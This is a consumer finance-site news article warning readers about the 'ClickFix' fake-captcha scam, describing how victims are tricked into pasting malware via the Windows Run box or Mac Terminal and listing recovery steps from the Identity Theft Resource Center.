May 29, 2026
Clicking a captcha "I am not a robot" box and identifying images to prove it is second nature for many internet users. Now, cybercriminals are exploiting people's comfort with the routine to scam them.
News outlets across the country are reporting on a new scam in which hackers use fake captchas to steal people's identity and financial information, accessing passwords to websites, cryptowallets and more.
Advertisement
As Security Boulevard reports, it's an insidious cybercrime because victims unwittingly type in commands to install the malware themselves (1). Once it's installed, cybercriminals have the keys to your computer and can even sell your information to others.
Here's how the fake captcha scam — also known as a ClickFix scam — plays out on both Windows (2) and Mac (3).
Tricking victims into installing malware themselves
It starts when you land on a website and get a "verify you are human" or other captcha prompt. It's what comes next that identifies the scam.
A message pops up saying the captcha system failed and you need to run some commands to resolve the problem. First, you may be asked to click a "Fix It" or "How to Fix" button (where the scam's alternate name "ClickFix" comes from). Unfortunately, this copies malware code onto your clipboard, but it doesn't install it. It's what victims unknowingly do next that installs the malware.
Victims who click the "Fix" button then get instructions to key in a series of commands, and it's this step that installs the malware.
On Windows, victims may be asked to key in commands like this:
- Win + R (which opens up the Windows Run box)
- Ctrl + V (which pastes the malware code into the Run box)
- Enter (which starts running the malware)
On a Mac device, they may be asked to key in:
Advertisement
- Command + Space (which opens Spotlight)
- Type "Terminal"
- Press Enter (opening up Terminal, an interface in which code can be entered into the system)
- Command + V (which pastes the malware code into the Terminal)
- Return (which starts running the malware)
As WGAL TV revealed, because victims install the code themselves, antivirus systems don't necessarily pick up the malware as an intruder (4).
Must Read
- You can now build wealth like a landlord for as little as $100 — and no, you don't have to chase down rent or take 3 A.M tenant calls
- Goldman Sachs used to hoard prime real estate deals for the ultrarich. Two ex-analysts just opened the door for $250
- Robert Kiyosaki begs investors not to miss this ‘explosion’ — says this 1 asset will surge 400% in a year
Join 250,000+ readers and get Moneywise’s best stories and exclusive interviews first — clear insights curated and delivered weekly. Subscribe now.
How to protect yourself
Real captchas will never ask people to fix anything with keystrokes, so if you get instructions to click on a button afterward, return to a safe site immediately.
The Identity Theft Resource Center provides advice on what to do if you think you accidentally clicked a Fix button or proceeded with commands in a fake captcha scam (5):
- Disconnect from the internet immediately by turning off your Wi-Fi or unplugging your internet cable
- Move to a clean device to change passwords to important accounts
- If you've already installed a trusted antivirus program, scan your original device (while it's disconnected from the internet) for viruses
- If you haven't installed an antivirus program, take your compromised device to a professional for an antivirus scan
- Monitor your banking and credit card accounts for any unexpected transactions
The best protection, as always, is being alert and proactive — which includes installing trusted antivirus programs on your computer in the event it gets infected. You can also use multi-factor authentication on all your sensitive accounts so that even if hackers get access to your passwords, they can't necessarily access your accounts.
Article Sources
We rely only on vetted sources and credible third-party reporting. For details, see our ethics and guidelines.
Security Boulevard (1); Microsoft (2); Bitdefender (3); WGAL TV (4); Identity Theft Resource Center (5).
You May Also Like
- Dave Ramsey warns nearly 50% of Americans are making 1 big Social Security mistake — here’s what it is and the simple steps to fix it ASAP
- Thanks to Jeff Bezos, you can now become a landlord for as little as $100 — and no, you don't have to deal with tenants or fix freezers. Here's how
- Millionaires under 43 are reshaping investing — just 25% of their portfolios are in stocks. Here’s where their money is going
- Robert Kiyosaki issues grim warning for baby boomers. Many could be ‘wiped out’ and homeless ‘all over’ the country. How to protect yourself now
Laura Boast is an Associate Editor with Moneywise.com and a lifelong content creator who has reached international audiences at Discovery, CBC, Blue Ant Media, Bond Brand Loyalty and more.
